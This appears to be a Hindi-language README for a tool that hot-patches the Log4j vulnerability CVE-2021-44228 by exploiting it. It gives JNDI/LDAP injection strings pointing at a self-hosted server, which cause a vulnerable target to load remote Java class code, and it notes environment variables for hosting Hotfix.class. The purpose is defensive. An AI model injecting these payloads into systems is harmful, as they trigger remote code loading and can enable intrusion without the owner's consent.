
CVE-2021-44228 को स्वयं भेद्यता का शोषण करके हॉट-पैच करें।
स्वयं भेद्यता का शोषण करके CVE-2021-44228 का हॉट-पैच।
CVE-2021-44228 के लिए संभावित रूप से संवेदनशील किसी भी स्थान पर निम्नलिखित कोड इंजेक्ट करें,
${jndi:ldap://your-own-server/patch}
पैच प्रक्रिया के दौरान MITM हमले को रोकने के लिए, निम्नलिखित पेलोड की अनुशंसा की जाती है, लेकिन Java के पुराने संस्करणों के साथ कम संगतता होती है,
${jndi:ldap://your-own-server/any_string_except_patch}
नवीनतम रिलीज़ डाउनलोड करें
यदि आप अपने स्वयं के सर्वर पर Hotfix.class होस्ट करना चाहते हैं तो सिस्टम पर्यावरण चर LOG4J_HOTFIX_HTTP_PATH और LOG4J_HOTFIX_HTTPS_PATH निर्दिष्ट करें
कृपया ध्यान दें कि अधिकतम संगतता के लिए Hotfix.java को JDK6 के साथ संकलित किया जाना चाहिए।